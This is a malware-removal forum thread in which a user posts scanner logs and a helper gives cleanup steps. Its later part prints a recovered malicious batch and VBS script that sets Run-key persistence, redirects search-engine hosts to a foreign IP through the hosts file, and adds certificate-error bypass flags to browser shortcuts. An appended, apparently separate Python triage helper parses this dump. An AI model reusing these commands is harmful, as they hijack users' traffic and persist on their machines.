
Hello everyone,

I'd like some help with what I think is some sort of malware/rootkit that has infected my PC.

I think I need to do a series of thorough scans, since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up an "Open file with" window right after I booted. I never clicked Open and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64. I also did all scans with Malwarebytes, RogueKiller64 and Microsoft Essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with the filename Adobe Speed Launcher, which I don't quite like, and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.

-I'm very confident that this is some sort of malware.

The reason is that this has never happened before, and there are 5 instances of said window when I just boot up. The other clue that this is not some legit program is that under the "Program/File" name I see MY first name, and that just can't be right.

 

-I've also found a "FILE" under C:\Users named "Tom" and I've attached it.

It looks super suspicious, I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it; nonetheless, the results are here: https://www.virustotal.com/en/file/60c32e7ba31fd30810d23222932a76129a7aa13347ece280c3a89f785c72d997/analysis/1421971881/

I proceeded to open it and it seems to be a text file with some code in it that I think is dead on: some sort of malware trying to connect to some IP address that's not even mine: 69.162.120.131

UPDATE:

 

Now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player", which I obviously have never installed since I hate that player.

The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

Someone's gotta help me get rid of this stuff; apparently none of the tools I've used so far has detected anything...

-Pasted RogueKiller report AND MBAM log, FRST, Addition, OTL reports

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version

Started in : Normal mode

User : Tom Jones [Administrator]

Mode : Scan -- Date : 01/22/2015 11:25:29

 

¤¤¤ Processes : 0 ¤¤¤

 

¤¤¤ Registry : 4 ¤¤¤

[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1 -> Found

 

¤¤¤ Tasks : 0 ¤¤¤

 

¤¤¤ Files : 0 ¤¤¤

 

¤¤¤ Hosts File : 2 ¤¤¤

[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

[C:\Windows\System32\drivers\etc\hosts] ::1 localhost

 

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

 

¤¤¤ Web browsers : 0 ¤¤¤

 

¤¤¤ MBR Check : ¤¤¤

+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++

--- User ---

[MBR] 97ed83405a22741aa5222a22e681b176

[bSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code

Partition table:

0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

User = LL1 ... OK

User = LL2 ... OK

 

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++

--- User ---

[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c

[bSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code

Partition table:

0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]

User = LL1 ... OK

Error reading LL2 MBR! ([1] Incorrect function. )

 

 

============================================

RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log

RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log

RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log

Thank you!

FRST.txt

Addition.txt

mbar-log-2015-01-22 (21-07-22).txt

Tom.txt


Hello,

They call me TwinHeadedEagle around here, and I'll be working with you.

Before we start please read and note the following:

  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Please be patient. I know it is frustrating when your PC isn't working properly, but malware removal takes time.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Do not paste the logs in your posts, attachments make my work easier. There is a More reply options button, that gives you Upload Files option below which you can use to attach your reports. Always attach reports from all tools.
  • Always execute my instructions in given order. If for some reason you cannot completely follow one instruction, inform me about that.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.
  • Do not ask for help for your business PC. Companies are making revenue via computers, so it is a good thing to pay someone to repair it.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Rules and policies

We won't support any piracy.

That being said, if any evidence of an illegal OS, software, cracks/keygens or anything else of the kind is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them.

Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please attach it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

Hello again and thank you for your reply.

 

Attached FRST.txt and Addition.txt.

 

Please take a look at my post, specifically the part where I inform you about the file found in C:\Users\ named "Tom", as my first name. I opened it before and I see some Windows script that tries to do something with some web addresses such as Google, Yahoo, etc. while trying to relay information to an IP that is NOT mine.

 

Thank you in advance!

FRST.txt

Addition.txt


From the reports above I do not see anything serious here. We will perform some maintenance and check your PC deeply.

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

Download the attached fixlist.txt file and save it to the Desktop:

Both files, FRST and fixlist.txt, have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click Run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished, FRST will generate a log on the Desktop called Fixlog.txt.

Please post it to your reply.

Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your Desktop.

  • Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
  • Wait until the database is updated.
  • Accept the Terms of use and click Scan.
  • When finished, please click Clean.
  • Upon completion, click Report. A log (AdwCleaner[s*].txt) will open.

Please upload the report in your reply.

Note: Reports will be saved in your system partition, usually at C:\Adwcleaner

Scan with TDSSKiller

Please download TDSSKiller by Kaspersky and save it to your desktop.

  • Right-click on the TDSSKiller icon and select Run as Administrator to start the tool.
  • Click on Change parameters and put a checkmark beside Loaded modules. A reboot will be needed to apply the changes, allow it to do so.
  • Your machine may appear very slow and unusable after that - it's normal.
  • TDSSKiller will run automatically. Click on Change parameters and click OK.
  • Click the Start Scan button and wait patiently.
  • If anything is found, follow these guidelines:
    • If a suspicious object is detected, the default action will be Skip, click on Continue.
    • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
      Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
      If Cure is not available, please choose Skip instead.
    • Do not choose Delete unless instructed!
    A report will be created in your root directory, (usually C:\ drive) in the form of TDSSKiller.[Version]_[Date]_[Time]_log.txt. Please include the contents of that file in your next post.

fixlist.txt


Does anyone around here have any clue what this script is doing?

-This was a file without an extension, found in C:\Users\

Please let me know even if you know a bit of it.

@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs
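As an added triage example (my own code, not anything posted in the thread or belonging to the tools it names): a Python script that takes the dumped text above apart and lists what it would have done, which is the question the last post asks. I read the trailing "Jones\AppData\Roaming\<name>" on every line as the tail of an unquoted redirect to C:\Users\Tom Jones\... that cmd cut at the space in the user name; that is a hypothesis, and the inputs are a constructed excerpt of the dump plus the clean hosts file RogueKiller printed earlier in the thread.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt of the dumped "Tom" file quoted in the thread (the real
# file has many more lines of the same shape). My hypothesis, not something the
# thread states: the dropper used an unquoted ">>C:\Users\Tom Jones\..." redirect,
# cmd cut it at the space in the user name, so the rest of the path was echoed
# into C:\Users\Tom together with each statement.
DUMP = r'''@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs'''

# Clean hosts file as RogueKiller printed it in the thread, plus a constructed
# copy with one of the batch's redirections appended.
CLEAN_HOSTS = "127.0.0.1 localhost\n::1 localhost\n"
INFECTED_HOSTS = CLEAN_HOSTS + "69.162.120.131 www.google.com\n"

SUFFIX = re.compile(r'\s+Jones\\AppData\\Roaming\\([\w.]+)$')
RUN_KEY = re.compile(r'REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" '
                     r'/V "([^"]+)".*?/D "([^"]+)"', re.I)
HOSTS_ECHO = re.compile(r'\|\|\s*echo (\d{1,3}(?:\.\d{1,3}){3}) (\S+)>>')
LOCAL = {"127.0.0.1", "::1", "0.0.0.0"}

def split_dump(text: str) -> List[Tuple[str, str]]:
    """Recover (script the line was meant for, statement) pairs from the dump."""
    pairs = []
    for line in text.splitlines():
        m = SUFFIX.search(line)
        if m:  # lines without the tell-tale suffix are not part of the dump
            pairs.append((m.group(1), line[:m.start()]))
    return pairs

def persistence_entries(pairs: List[Tuple[str, str]]) -> Dict[str, str]:
    """HKCU Run values the batch would create, mapped to the script each launches."""
    found = {}
    for _, stmt in pairs:
        m = RUN_KEY.search(stmt)
        if m:
            found[m.group(1)] = m.group(2)
    return found

def hosts_redirects(pairs: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """(ip, hostname) lines the batch would append to the hosts file."""
    return [m.groups() for _, stmt in pairs if (m := HOSTS_ECHO.search(stmt))]

def suspicious_hosts_lines(hosts_text: str) -> List[Tuple[str, str]]:
    """Hosts entries that point a name at a non-local address: the shape of a
    search-engine hijack like the one the batch above scripts."""
    hits = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()  # drop comments, then tokenize
        if len(fields) >= 2 and fields[0] not in LOCAL:
            hits.extend((fields[0], name) for name in fields[1:])
    return hits
```

Run suspicious_hosts_lines over your own C:\Windows\System32\drivers\etc\hosts to confirm it matches the two-line clean output RogueKiller showed, and compare any Run-key names it reports against the HKCU Run and RunOnce keys you already looked at.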

This topic is now closed to further replies.